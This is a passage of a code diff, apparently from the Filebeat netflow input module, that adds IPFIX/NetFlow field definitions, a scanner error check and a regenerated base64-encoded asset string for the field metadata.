name: reverse_post_mcast_packet_delta_count + type: long + + - name: reverse_post_mcast_packet_total_count + type: long + + - name: reverse_post_mpls_top_label_exp + type: short + + - name: reverse_post_napt_destination_transport_port + type: integer + + - name: reverse_post_napt_source_transport_port + type: integer + + - name: reverse_post_nat_destination_ipv4_address + type: ip + + - name: reverse_post_nat_destination_ipv6_address + type: ip + + - name: reverse_post_nat_source_ipv4_address + type: ip + + - name: reverse_post_nat_source_ipv6_address + type: ip + + - name: reverse_post_octet_delta_count + type: long + + - name: reverse_post_octet_total_count + type: long + + - name: reverse_post_packet_delta_count + type: long + + - name: reverse_post_packet_total_count + type: long + + - name: reverse_post_source_mac_address + type: keyword + + - name: reverse_post_vlan_id + type: integer + + - name: reverse_private_enterprise_number + type: long + + - name: reverse_protocol_identifier + type: short + + - name: reverse_pseudo_wire_control_word + type: long + + - name: reverse_pseudo_wire_destination_ipv4_address + type: ip + + - name: reverse_pseudo_wire_id + type: long + + - name: reverse_pseudo_wire_type + type: integer + + - name: reverse_relative_error + type: double + + - name: reverse_responder_octets + type: long + + - name: reverse_responder_packets + type: long + + - name: reverse_rfc3550_jitter_microseconds + type: long + + - name: reverse_rfc3550_jitter_milliseconds + type: long + + - name: reverse_rfc3550_jitter_nanoseconds + type: long + + - name: reverse_rtp_payload_type + type: short + + - name: reverse_rtp_sequence_number + type: integer + + - name: reverse_sampler_id + type: short + + - name: reverse_sampler_mode + type: short + + - name: reverse_sampler_name + type: keyword + + - name: reverse_sampler_random_interval + type: long + + - name: reverse_sampling_algorithm + type: short + + - name: reverse_sampling_flow_interval + type: long + + - name: reverse_sampling_flow_spacing + type: long + + - name: reverse_sampling_interval + type: long + + - name: reverse_sampling_packet_interval + type: long + + - name: reverse_sampling_packet_space + type: long + + - name: reverse_sampling_population + type: long + + - name: reverse_sampling_probability + type: double + + - name: reverse_sampling_size + type: long + + - name: reverse_sampling_time_interval + type: long + + - name: reverse_sampling_time_space + type: long + + - name: reverse_second_packet_banner + type: keyword + + - name: reverse_section_exported_octets + type: integer + + - name: reverse_section_offset + type: integer + + - name: reverse_selection_sequence_id + type: long + + - name: reverse_selector_algorithm + type: integer + + - name: reverse_selector_id + type: long + + - name: reverse_selector_id_total_flows_observed + type: long + + - name: reverse_selector_id_total_flows_selected + type: long + + - name: reverse_selector_id_total_pkts_observed + type: long + + - name: reverse_selector_id_total_pkts_selected + type: long + + - name: reverse_selector_name + type: keyword + + - name: reverse_session_scope + type: short + + - name: reverse_small_packet_count + type: long + + - name: reverse_source_ipv4_address + type: ip + + - name: reverse_source_ipv4_prefix + type: ip + + - name: reverse_source_ipv4_prefix_length + type: short + + - name: reverse_source_ipv6_address + type: ip + + - name: reverse_source_ipv6_prefix + type: ip + + - name: reverse_source_ipv6_prefix_length + type: short + + - name: reverse_source_mac_address + type: keyword + + - name: reverse_source_transport_port + type: integer + + - name: reverse_src_traffic_index + type: long + + - name: reverse_sta_ipv4_address + type: ip + + - name: reverse_sta_mac_address + type: keyword + + - name: reverse_standard_deviation_interarrival_time + type: long + + - name: reverse_standard_deviation_payload_length + type: integer + + - name: reverse_system_init_time_milliseconds + type: long + + - name: reverse_tcp_ack_total_count + type: long + + - name: reverse_tcp_acknowledgement_number + type: long + + - name: reverse_tcp_control_bits + type: integer + + - name: reverse_tcp_destination_port + type: integer + + - name: reverse_tcp_fin_total_count + type: long + + - name: reverse_tcp_header_length + type: short + + - name: reverse_tcp_options + type: long + + - name: reverse_tcp_psh_total_count + type: long + + - name: reverse_tcp_rst_total_count + type: long + + - name: reverse_tcp_sequence_number + type: long + + - name: reverse_tcp_source_port + type: integer + + - name: reverse_tcp_syn_total_count + type: long + + - name: reverse_tcp_urg_total_count + type: long + + - name: reverse_tcp_urgent_pointer + type: integer + + - name: reverse_tcp_window_scale + type: integer + + - name: reverse_tcp_window_size + type: integer + + - name: reverse_total_length_ipv4 + type: integer + + - name: reverse_transport_octet_delta_count + type: long + + - name: reverse_transport_packet_delta_count + type: long + + - name: reverse_tunnel_technology + type: keyword + + - name: reverse_udp_destination_port + type: integer + + - name: reverse_udp_message_length + type: integer + + - name: reverse_udp_source_port + type: integer + + - name: reverse_union_tcp_flags + type: short + + - name: reverse_upper_ci_limit + type: double + + - name: reverse_user_name + type: keyword + + - name: reverse_value_distribution_method + type: short + + - name: reverse_virtual_station_interface_id + type: keyword + + - name: reverse_virtual_station_interface_name + type: keyword + + - name: reverse_virtual_station_name + type: keyword + + - name: reverse_virtual_station_uuid + type: keyword + + - name: reverse_vlan_id + type: integer + + - name: reverse_vr_fname + type: keyword + + - name: reverse_wlan_channel_id + type: short + + - name: reverse_wlan_ssid + type: keyword + + - name: reverse_wtp_mac_address + type: keyword + + - name: rfc3550_jitter_microseconds + type: long + + - name: rfc3550_jitter_milliseconds + type: long + + - name: rfc3550_jitter_nanoseconds + type: long + + - name: rtp_payload_type + type: short + + - name: rtp_sequence_number + type: integer + + - name: sampler_id + type: short + + - name: sampler_mode + type: short + + - name: sampler_name + type: keyword + + - name: sampler_random_interval type: long + - name: sampling_algorithm + type: short + - name: sampling_flow_interval type: long - name: sampling_flow_spacing type: long - - name: flow_sampling_time_interval + - name: sampling_interval type: long - - name: flow_sampling_time_spacing + - name: sampling_packet_interval + type: long + + - name: sampling_packet_space + type: long + + - name: sampling_population + type: long + + - name: sampling_probability + type: double + + - name: sampling_size + type: long + + - name: sampling_time_interval + type: long + + - name: sampling_time_space + type: long + + - name: second_packet_banner + type: keyword + + - name: section_exported_octets + type: integer + + - name: section_offset + type: integer + + - name: selection_sequence_id + type: long + + - name: selector_algorithm + type: integer + + - name: selector_id + type: long + + - name: selector_id_total_flows_observed + type: long + + - name: selector_id_total_flows_selected + type: long + + - name: selector_id_total_pkts_observed type: long - - name: hash_flow_domain + - name: selector_id_total_pkts_selected + type: long + + - name: selector_name + type: keyword + + - name: service_name + type: keyword + + - name: session_scope + type: short + + - name: silk_app_label type: integer - - name: transport_octet_delta_count + - name: small_packet_count type: long - - name: transport_packet_delta_count - type: long + - name: source_ipv4_address + type: ip - - name: original_exporter_ipv4_address + - name: source_ipv4_prefix type: ip - - name: original_exporter_ipv6_address + - name: source_ipv4_prefix_length + type: short + + - name: source_ipv6_address type: ip - - name: original_observation_domain_id - type: long + - name: source_ipv6_prefix + type: ip - - name: intermediate_process_id - type: long + - name: source_ipv6_prefix_length + type: short - - name: ignored_data_record_total_count - type: long + - name: source_mac_address + type: keyword - - name: data_link_frame_type + - name: source_transport_port type: integer - - name: section_offset + - name: source_transport_ports_limit type: integer - - name: section_exported_octets - type: integer + - name: src_traffic_index + type: long - - name: dot1q_service_instance_tag - type: short + - name: ssl_cert_serial_number + type: keyword - - name: dot1q_service_instance_id - type: long + - name: ssl_cert_signature + type: keyword - - name: dot1q_service_instance_priority + - name: ssl_cert_validity_not_after + type: keyword + + - name: ssl_cert_validity_not_before + type: keyword + + - name: ssl_cert_version type: short - - name: dot1q_customer_source_mac_address + - name: ssl_certificate_hash type: keyword - - name: dot1q_customer_destination_mac_address + - name: ssl_cipher type: keyword - - name: post_layer2_octet_delta_count - type: long + - name: ssl_client_version + type: short - - name: post_mcast_layer2_octet_delta_count - type: long + - name: ssl_compression_method + type: short - - name: post_layer2_octet_total_count - type: long + - name: ssl_object_type + type: keyword - - name: post_mcast_layer2_octet_total_count - type: long + - name: ssl_object_value + type: keyword - - name: minimum_layer2_total_length - type: long + - name: ssl_public_key_algorithm + type: keyword - - name: maximum_layer2_total_length - type: long + - name: ssl_public_key_length + type: keyword - - name: dropped_layer2_octet_delta_count + - name: ssl_server_cipher type: long - - name: dropped_layer2_octet_total_count - type: long + - name: ssl_server_name + type: keyword - - name: ignored_layer2_octet_total_count - type: long + - name: sta_ipv4_address + type: ip - - name: not_sent_layer2_octet_total_count - type: long + - name: sta_mac_address + type: keyword - - name: layer2_octet_delta_sum_of_squares + - name: standard_deviation_interarrival_time type: long - - name: layer2_octet_total_sum_of_squares - type: long + - name: standard_deviation_payload_length + type: short - - name: layer2_frame_delta_count - type: long + - name: system_init_time_milliseconds + type: date - - name: layer2_frame_total_count + - name: tcp_ack_total_count type: long - - name: pseudo_wire_destination_ipv4_address - type: ip - - - name: ignored_layer2_frame_total_count + - name: tcp_acknowledgement_number type: long - - name: mib_object_value_integer + - name: tcp_control_bits type: integer - - name: mib_object_value_octet_string - type: short + - name: tcp_destination_port + type: integer - - name: mib_object_value_oid - type: short + - name: tcp_fin_total_count + type: long - - name: mib_object_value_bits + - name: tcp_header_length type: short - - name: mib_object_value_ip_address - type: ip - - - name: mib_object_value_counter + - name: tcp_options type: long - - name: mib_object_value_gauge + - name: tcp_psh_total_count type: long - - name: mib_object_value_time_ticks + - name: tcp_rst_total_count type: long - - name: mib_object_value_unsigned + - name: tcp_sequence_number type: long - - name: mib_object_identifier - type: short + - name: tcp_source_port + type: integer - - name: mib_sub_identifier + - name: tcp_syn_total_count type: long - - name: mib_index_indicator + - name: tcp_urg_total_count type: long - - name: mib_capture_time_semantics - type: short + - name: tcp_urgent_pointer + type: integer - - name: mib_context_engine_id - type: short + - name: tcp_window_scale + type: integer - - name: mib_context_name - type: keyword + - name: tcp_window_size + type: integer - - name: mib_object_name - type: keyword + - name: template_id + type: integer - - name: mib_object_description + - name: tftp_filename type: keyword - - name: mib_object_syntax + - name: tftp_mode type: keyword - - name: mib_module_name - type: keyword + - name: timestamp + type: long - - name: mobile_imsi - type: keyword + - name: timestamp_absolute_monitoring-interval + type: long - - name: mobile_msisdn + - name: total_length_ipv4 + type: integer + + - name: traffic_type + type: short + + - name: transport_octet_delta_count + type: long + + - name: transport_packet_delta_count + type: long + + - name: tunnel_technology type: keyword - - name: http_status_code + - name: udp_destination_port type: integer - - name: source_transport_ports_limit + - name: udp_message_length type: integer - - name: http_request_method - type: keyword + - name: udp_source_port + type: integer - - name: http_request_host - type: keyword + - name: union_tcp_flags + type: short - - name: http_request_target - type: keyword + - name: upper_ci_limit + type: double - - name: http_message_version + - name: user_name type: keyword - - name: nat_instance_id - type: long - - - name: internal_address_realm - type: short + - name: username + type: keyword - - name: external_address_realm + - name: value_distribution_method type: short - - name: nat_quota_exceeded_event + - name: viptela_vpn_id type: long - - name: nat_threshold_event - type: long + - name: virtual_station_interface_id + type: short - - name: http_user_agent + - name: virtual_station_interface_name type: keyword - - name: http_content_type + - name: virtual_station_name type: keyword - - name: http_reason_phrase - type: keyword + - name: virtual_station_uuid + type: short - - name: max_session_entries - type: long + - name: vlan_id + type: integer - - name: max_bib_entries - type: long + - name: vmware_egress_interface_attr + type: integer - - name: max_entries_per_user - type: long + - name: vmware_ingress_interface_attr + type: integer - - name: max_subscribers - type: long + - name: vmware_tenant_dest_ipv4 + type: ip - - name: max_fragments_pending_reassembly - type: long + - name: vmware_tenant_dest_ipv6 + type: ip - - name: address_pool_high_threshold - type: long + - name: vmware_tenant_dest_port + type: integer - - name: address_pool_low_threshold - type: long + - name: vmware_tenant_protocol + type: short - - name: address_port_mapping_high_threshold - type: long + - name: vmware_tenant_source_ipv4 + type: ip - - name: address_port_mapping_low_threshold - type: long + - name: vmware_tenant_source_ipv6 + type: ip - - name: address_port_mapping_per_user_high_threshold - type: long + - name: vmware_tenant_source_port + type: integer - - name: global_address_mapping_high_threshold - type: long + - name: vmware_vxlan_export_role + type: short - name: vpn_identifier type: short + - name: vr_fname + type: keyword + + - name: waasoptimization_segment + type: short + + - name: wlan_channel_id + type: short + + - name: wlan_ssid + type: keyword + + - name: wtp_mac_address + type: keyword + + - name: xlate_destination_address_ip_v4 + type: ip + + - name: xlate_destination_port + type: integer + + - name: xlate_source_address_ip_v4 + type: ip + + - name: xlate_source_port + type: integer + diff --git a/x-pack/filebeat/input/netflow/decoder/fields/gen.go b/x-pack/filebeat/input/netflow/decoder/fields/gen.go index 743c1a062cbe..2f5d04b28ad1 100644 --- a/x-pack/filebeat/input/netflow/decoder/fields/gen.go +++ b/x-pack/filebeat/input/netflow/decoder/fields/gen.go @@ -131,6 +131,11 @@ func main() { filtered.WriteByte('\n') } } + if scanner.Err() != nil { + fmt.Fprintf(os.Stderr, "Failed reading from %s: %v\n", *header, err) + os.Exit(2) + } + reader := csv.NewReader(filtered) for lineNum := 1; ; lineNum++ { record, err := reader.Read() diff --git a/x-pack/filebeat/input/netflow/doc.go b/x-pack/filebeat/input/netflow/doc.go index 371e8cd66859..c5fee475d7e4 100644 --- a/x-pack/filebeat/input/netflow/doc.go +++ b/x-pack/filebeat/input/netflow/doc.go @@ -4,4 +4,5 @@ package netflow -//go:generate go run fields_gen.go -output _meta/fields.yml --column-name=2 --column-type=3 --header _meta/fields.header.yml decoder/fields/ipfix-information-elements.csv +// Generate fields.yml for all Netflow fields. +//go:generate go run fields_gen.go --header _meta/fields.header.yml -output _meta/fields.yml decoder/fields/ipfix-information-elements.csv,2,3,true decoder/fields/cert_pen6871.csv,3,4,true decoder/fields/cisco.csv,1,4,true decoder/fields/assorted.csv,3,4,true diff --git a/x-pack/filebeat/input/netflow/fields.go b/x-pack/filebeat/input/netflow/fields.go index c1b9fcf244e3..5dd614b6b22c 100644 --- a/x-pack/filebeat/input/netflow/fields.go +++ b/x-pack/filebeat/input/netflow/fields.go @@ -19,5 +19,5 @@ func init() { // AssetNetflow returns asset data. // This is the base64 encoded gzipped contents of input/netflow. func AssetNetflow() string { - return "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" + return "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